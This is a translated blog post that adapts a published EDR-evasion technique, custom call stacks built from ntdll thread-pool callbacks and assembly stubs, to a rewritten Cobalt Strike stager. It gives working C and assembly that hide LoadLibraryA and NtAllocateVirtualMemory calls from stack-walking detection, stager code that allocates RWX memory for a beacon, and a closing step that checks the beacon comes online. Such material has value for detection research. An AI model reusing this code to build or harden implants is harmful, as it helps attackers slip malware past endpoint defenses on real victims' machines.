Original article: Shellcode Development Using Custom Call Stacks (利用自定义堆栈进行 Shellcode 开发)
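1. Overview

I recently studied the blog post the BRC4 author published in January, Hiding In PlainSight - Indirect Syscall is Dead! Long Live Custom Call Stacks (referred to below as "the original article"). It describes techniques for bypassing EDR by using callback functions and a small amount of assembly to reshape the call stack. A few days earlier I had rewritten the CS shellcode, so in this post I apply some of the article's techniques to that shellcode. It can be read as a sequel to my earlier post, CS 4.7 Stager 逆向及 Shellcode 重写 (CS 4.7 Stager Reversing and Shellcode Rewrite) on 先知社区 (Xianzhi).

2. What the EDR Checks

Some EDRs use user-mode hooks or ETW to capture a stack trace whenever a sensitive API is called, then walk the return addresses on the stack to catch shellcode:

```text
|-----------Top Of The Stack-----------|
|                                      |
|                                      |
|--------------------------------------|
|------Stack Frame of LoadLibrary------|
|    Return address of RX on disk      |
|                                      |
|----------Stack Frame of RX-----------| <- Detection (An unbacked RX region should never call LoadLibraryA)
|    Return address of PE on disk      |
|                                      |
|-----------Stack Frame of PE----------|
| Return address of RtlUserThreadStart |
|                                      |
|---------Bottom Of The Stack----------|
```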
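3. Using Callback Functions

A callback function is a function that is called through a function pointer. If you pass a pointer to a function (its address) as an argument to another function, and that pointer is later used to call the function it points to, the pointed-to function is a callback. A callback is not called directly by the code that implements it; another party calls it when a particular event or condition occurs, so that it can respond to that event or condition.

In the original article the author uses TpAllocWork as the example. Its prototype is:

```c
NTSTATUS NTAPI TpAllocWork(
    PTP_WORK* ptpWrk,
    PTP_WORK_CALLBACK pfnwkCallback,
    PVOID OptionalArg,
    PTP_CALLBACK_ENVIRON CallbackEnvironment
);
```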
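The second parameter is a function pointer. If we replace it with a pointer to LoadLibraryA, LoadLibraryA is handed to TpAllocWork as the callback. TpPostWork then posts the work item to the thread pool, and a worker thread executes the callback saved by TpAllocWork. LoadLibraryA's return address therefore points into ntdll's thread-pool code (TppWorkpExecuteCallback, as shown later) instead of into our shellcode. The idealized, simplified return chain is:

```text
LoadLibraryA -> TpPostWork -> RtlUserThreadStart
```

The third parameter is the argument for the callback; in the original article it is wininet.dll, which we need to pass to LoadLibraryA. However, the second parameter's type, PTP_WORK_CALLBACK, has this prototype:

```c
VOID CALLBACK WorkCallback(
    PTP_CALLBACK_INSTANCE Instance,
    PVOID Context,
    PTP_WORK Work
);
```

As a result, the argument cannot reach LoadLibraryA correctly. wininet.dll ends up in RDX, which the Windows x64 calling convention uses for the second argument, but LoadLibraryA has no second argument: it reads its single parameter, the file name, from RCX, which at this point holds the PTP_CALLBACK_INSTANCE pointer.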
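3.1 Replacing LoadLibraryA

As mentioned in the previous section, TpAllocWork cannot pass wininet.dll to LoadLibraryA correctly. The original author's trick here is a few lines of assembly that copy the argument from RDX into RCX, call getLoadLibraryA to get LoadLibraryA's address in RAX, and jump to it:

```nasm
section .text
extern getLoadLibraryA
global WorkCallback
WorkCallback:
    mov rcx, rdx            ; Context (the DLL name) becomes the 1st argument
    xor rdx, rdx
    call getLoadLibraryA    ; RAX = address of LoadLibraryA
    jmp rax                 ; jump, not call: no extra return address is pushed
```

RCX carries the first argument in the x64 calling convention, and getLoadLibraryA returns its value in RAX, so at that point RAX holds LoadLibraryA's address. Jumping there with jmp passes wininet.dll to LoadLibraryA correctly. Because jmp, unlike call, pushes no return address, LoadLibraryA later returns directly to whoever called WorkCallback, and the stub itself does not appear in LoadLibraryA's call stack. getLoadLibraryA is simply: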
```c
UINT_PTR getLoadLibraryA() {
    return (UINT_PTR)pLoadLibraryA;
}
```
Figure: the call stack after the modification.

The author's example code:
```c
#include <windows.h>
#include <winternl.h> // NTSTATUS
#include <stdio.h>

// Prototypes of the undocumented ntdll thread-pool exports
typedef NTSTATUS (NTAPI* TPALLOCWORK)(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
typedef VOID (NTAPI* TPPOSTWORK)(PTP_WORK);
typedef VOID (NTAPI* TPRELEASEWORK)(PTP_WORK);

// Global read by the assembly stub through getLoadLibraryA()
FARPROC pLoadLibraryA;

UINT_PTR getLoadLibraryA() {
    return (UINT_PTR)pLoadLibraryA;
}

// Defined in the assembly file: moves RDX (Context) into RCX and jumps to LoadLibraryA
extern VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);

int main() {
    pLoadLibraryA = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
    FARPROC pTpAllocWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpAllocWork");
    FARPROC pTpPostWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpPostWork");
    FARPROC pTpReleaseWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpReleaseWork");
    CHAR *libName = "wininet.dll";
    PTP_WORK WorkReturn = NULL;
    // Register WorkCallback with libName as its Context, then queue it
    ((TPALLOCWORK)pTpAllocWork)(&WorkReturn, (PTP_WORK_CALLBACK)WorkCallback, libName, NULL);
    ((TPPOSTWORK)pTpPostWork)(WorkReturn);
    ((TPRELEASEWORK)pTpReleaseWork)(WorkReturn);
    // The current-process pseudo-handle is never signaled, so this just waits 0x1000 ms for the worker thread
    WaitForSingleObject((HANDLE)-1, 0x1000);
    printf("hWininet: %p\n", GetModuleHandleA(libName));
    return 0;
}
```
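Here the author uses a global variable, pLoadLibraryA, from which getLoadLibraryA returns LoadLibraryA's address. Since we are writing shellcode, we cannot use global variables: the shellcode is carved out of the code section alone, so there is no data section for a global to live in. I therefore modified getLoadLibraryA so that pLoadLibraryA is a local variable whose value comes from GetProcAddressWithHash:

```c
EXTERN_C UINT_PTR getLoadLibraryA() {
    // 0x0726774C: hash of kernel32.dll!LoadLibraryA
    // (FN_LoadLibraryA and GetProcAddressWithHash come from the previous article)
    FN_LoadLibraryA pLoadLibraryA = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C);
    return (UINT_PTR)pLoadLibraryA;
}
```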
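This introduces a new problem. RCX, RDX, R8 and R9 are volatile registers, so after GetProcAddressWithHash is called their values have changed, and wininet.dll once again fails to reach LoadLibraryA. My workaround is to park the argument in an xmm register while getLoadLibraryA runs. Keep in mind that xmm3 is also volatile under the Windows x64 ABI, so this relies on getLoadLibraryA and GetProcAddressWithHash happening not to overwrite it. The modified assembly:

```asm
myLoadLibrary PROC
    movq xmm3, rdx          ; park Context (the DLL name) while getLoadLibraryA runs
    xor rdx, rdx
    call getLoadLibraryA    ; RAX = address of LoadLibraryA
    movq rcx, xmm3          ; Context becomes LoadLibraryA's first argument
    xorps xmm3, xmm3
    jmp rax                 ; LoadLibraryA returns directly to our caller
myLoadLibrary ENDP
```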
3.2 Replacing VirtualAlloc

Besides watching DLL loading, EDRs also monitor certain sensitive API functions; the original article uses NtAllocateVirtualMemory as its example. First, create a structure that holds the address of NtAllocateVirtualMemory and its arguments:

```c
typedef struct _NTALLOCATEVIRTUALMEMORY_ARGS {
    UINT_PTR pNtAllocateVirtualMemory; // pointer to NtAllocateVirtualMemory - rax
    HANDLE hProcess;                   // HANDLE ProcessHandle - rcx
    PVOID* address;                    // PVOID *BaseAddress - rdx; ULONG_PTR ZeroBits - 0 - r8
    PSIZE_T size;                      // PSIZE_T RegionSize - r9; ULONG AllocationType - MEM_RESERVE|MEM_COMMIT = 0x3000 - stack (5th arg)
    ULONG permissions;                 // ULONG Protect - PAGE_EXECUTE_READ = 0x20 - stack (6th arg)
} NTALLOCATEVIRTUALMEMORY_ARGS, *PNTALLOCATEVIRTUALMEMORY_ARGS;
```
Next, we initialize this structure and pass a pointer to it to TpAllocWork as the argument for our callback:
```c
#include <windows.h>
#include <winternl.h> // NTSTATUS
#include <stdio.h>

typedef NTSTATUS (NTAPI* TPALLOCWORK)(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
typedef VOID (NTAPI* TPPOSTWORK)(PTP_WORK);
typedef VOID (NTAPI* TPRELEASEWORK)(PTP_WORK);

typedef struct _NTALLOCATEVIRTUALMEMORY_ARGS {
    UINT_PTR pNtAllocateVirtualMemory; // pointer to NtAllocateVirtualMemory - rax
    HANDLE hProcess;                   // HANDLE ProcessHandle - rcx
    PVOID* address;                    // PVOID *BaseAddress - rdx; ULONG_PTR ZeroBits - 0 - r8
    PSIZE_T size;                      // PSIZE_T RegionSize - r9; ULONG AllocationType - MEM_RESERVE|MEM_COMMIT = 0x3000 - stack (5th arg)
    ULONG permissions;                 // ULONG Protect - PAGE_EXECUTE_READ = 0x20 - stack (6th arg)
} NTALLOCATEVIRTUALMEMORY_ARGS, *PNTALLOCATEVIRTUALMEMORY_ARGS;

// Defined in the assembly file: unpacks the struct into registers/stack and jumps to NtAllocateVirtualMemory
extern VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);

int main() {
    LPVOID allocatedAddress = NULL;
    SIZE_T allocatedsize = 0x1000;

    // Pack NtAllocateVirtualMemory and its arguments into one Context pointer
    NTALLOCATEVIRTUALMEMORY_ARGS ntAllocateVirtualMemoryArgs = { 0 };
    ntAllocateVirtualMemoryArgs.pNtAllocateVirtualMemory = (UINT_PTR) GetProcAddress(GetModuleHandleA("ntdll"), "NtAllocateVirtualMemory");
    ntAllocateVirtualMemoryArgs.hProcess = (HANDLE)-1;
    ntAllocateVirtualMemoryArgs.address = &allocatedAddress;
    ntAllocateVirtualMemoryArgs.size = &allocatedsize;
    ntAllocateVirtualMemoryArgs.permissions = PAGE_EXECUTE_READ;

    FARPROC pTpAllocWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpAllocWork");
    FARPROC pTpPostWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpPostWork");
    FARPROC pTpReleaseWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpReleaseWork");
    PTP_WORK WorkReturn = NULL;
    ((TPALLOCWORK)pTpAllocWork)(&WorkReturn, (PTP_WORK_CALLBACK)WorkCallback, &ntAllocateVirtualMemoryArgs, NULL);
    ((TPPOSTWORK)pTpPostWork)(WorkReturn);
    ((TPRELEASEWORK)pTpReleaseWork)(WorkReturn);
    // Wait 0x1000 ms for the worker thread to finish
    WaitForSingleObject((HANDLE)-1, 0x1000);
    printf("allocatedAddress: %p\n", allocatedAddress);
    getchar();
    return 0;
}
```
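When handling LoadLibraryA, we wrote a few lines of assembly that moved the argument from RDX into RCX, so that a function with the PTP_WORK_CALLBACK signature could pass the correct argument to LoadLibraryA. NtAllocateVirtualMemory, however, takes 6 arguments: the first four are passed in RCX, RDX, R8 and R9, and the remaining two must be passed on the stack. Our WorkCallback is actually invoked by another function, TppWorkpExecuteCallback, so on entry the top of the stack holds the return address into that function.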
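If we changed the top of the stack here, pushing or reserving new space for NtAllocateVirtualMemory's arguments, we would break this layout and WorkCallback could no longer return correctly. So we must leave the existing stack layout untouched while still placing NtAllocateVirtualMemory's arguments inside it. Because the stub jumps to NtAllocateVirtualMemory instead of calling it, NtAllocateVirtualMemory sees the same RSP and reads its fifth and sixth arguments from [rsp+0x28] and [rsp+0x30], which lie in TppWorkpExecuteCallback's stack frame; conveniently, that frame has enough room for them. The author's assembly code: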
```nasm
section .text
global WorkCallback
WorkCallback:
    mov rbx, rdx            ; backing up the struct as we are going to stomp rdx
                            ; (note: rbx is nonvolatile in the x64 ABI and is not restored here)
    mov rax, [rbx]          ; NtAllocateVirtualMemory
    mov rcx, [rbx + 0x8]    ; HANDLE ProcessHandle
    mov rdx, [rbx + 0x10]   ; PVOID *BaseAddress
    xor r8, r8              ; ULONG_PTR ZeroBits
    mov r9, [rbx + 0x18]    ; PSIZE_T RegionSize
    mov r10, [rbx + 0x20]   ; ULONG Protect
    mov [rsp+0x30], r10     ; 6th argument slot on the stack
    mov r10, 0x3000         ; ULONG AllocationType (MEM_COMMIT | MEM_RESERVE)
    mov [rsp+0x28], r10     ; 5th argument slot on the stack
    jmp rax                 ; NtAllocateVirtualMemory returns straight to TppWorkpExecuteCallback
```
Figure: registers and stack at the moment NtAllocateVirtualMemory is called.

At this point, NtAllocateVirtualMemory's call stack shows no obvious link to our shellcode region.
4. Building the Shellcode

I covered how to write the shellcode in CS 4.7 Stager 逆向及 Shellcode 重写 (CS 4.7 Stager Reversing and Shellcode Rewrite) on 先知社区 (Xianzhi), so I won't repeat it here. Loading modules through the LoadLibraryA replacement:

```c
/* Load User32.dll */
ai.pfnTpAllocWork(&LoadUser32, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szUser32, NULL);
ai.pfnTpPostWork(LoadUser32);
ai.pfnTpReleaseWork(LoadUser32);

/* Load Wininet.dll */
ai.pfnTpAllocWork(&LoadWininet, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szWininet, NULL);
ai.pfnTpPostWork(LoadWininet);
ai.pfnTpReleaseWork(LoadWininet);
```
Allocating memory through the VirtualAlloc replacement:

```c
/* Allocate Memory For URL */
ntAllocateVirtualMemoryUrlArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D);
ntAllocateVirtualMemoryUrlArgs.hProcess = (HANDLE)-1;
ntAllocateVirtualMemoryUrlArgs.address = &httpurl;
ntAllocateVirtualMemoryUrlArgs.size = &allocatedurlsize;
ntAllocateVirtualMemoryUrlArgs.permissions = PAGE_READWRITE;
ai.pfnTpAllocWork(&AllocUrl, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryUrlArgs, NULL);
ai.pfnTpPostWork(AllocUrl);
ai.pfnTpReleaseWork(AllocUrl);

/* Allocate Memory For Beacon */
ntAllocateVirtualMemoryBeaconArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D);
ntAllocateVirtualMemoryBeaconArgs.hProcess = (HANDLE)-1;
ntAllocateVirtualMemoryBeaconArgs.address = &beacon;
ntAllocateVirtualMemoryBeaconArgs.size = &allocatedbeaconsize;
ntAllocateVirtualMemoryBeaconArgs.permissions = PAGE_EXECUTE_READWRITE;
ai.pfnTpAllocWork(&AllocBeacon, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryBeaconArgs, NULL);
ai.pfnTpPostWork(AllocBeacon);
ai.pfnTpReleaseWork(AllocBeacon);
```
Assembly for the callbacks:

```asm
EXTRN getLoadLibraryA: PROC
PUBLIC myLoadLibrary
PUBLIC myNtAllocateVirtualMemory

_TEXT SEGMENT

myLoadLibrary PROC
    movq xmm3, rdx          ; park Context (the DLL name)
    xor rdx, rdx
    call getLoadLibraryA    ; RAX = address of LoadLibraryA
    movq rcx, xmm3          ; Context becomes the 1st argument
    xorps xmm3, xmm3
    jmp rax
myLoadLibrary ENDP

myNtAllocateVirtualMemory PROC
    mov rbx, rdx            ; backing up the struct as we are going to stomp rdx
    mov rax, [rbx]          ; NtAllocateVirtualMemory
    mov rcx, [rbx + 8h]     ; HANDLE ProcessHandle
    mov rdx, [rbx + 10h]    ; PVOID *BaseAddress
    xor r8, r8              ; ULONG_PTR ZeroBits
    mov r9, [rbx + 18h]     ; PSIZE_T RegionSize
    mov r10, [rbx + 20h]    ; ULONG Protect
    mov [rsp+30h], r10      ; 6th argument slot on the stack
    mov r10, 3000h          ; ULONG AllocationType (MEM_COMMIT | MEM_RESERVE)
    mov [rsp+28h], r10      ; 5th argument slot on the stack
    jmp rax
myNtAllocateVirtualMemory ENDP

_TEXT ENDS

END
```
Assemble the assembly part into an .obj file, then add it as an additional dependency under the project's Linker settings.
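Note that the project must either have optimization disabled or be set to optimize for speed; otherwise the compiled shellcode does not run correctly (I'm not sure why; if anyone knows, please let me know). This also makes the extracted shellcode more than twice as large as before. One possible factor, not verified here: myLoadLibrary calls getLoadLibraryA immediately on entry, so the call is made with RSP misaligned by 8 and without the 32-byte shadow space the x64 ABI requires. The callee's home space then overlaps the slot holding the return address into TppWorkpExecuteCallback, and optimized code often saves registers into its home space, which would corrupt the address LoadLibraryA later returns to.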
Extract the shellcode and use a simple loader to test that the beacon comes online.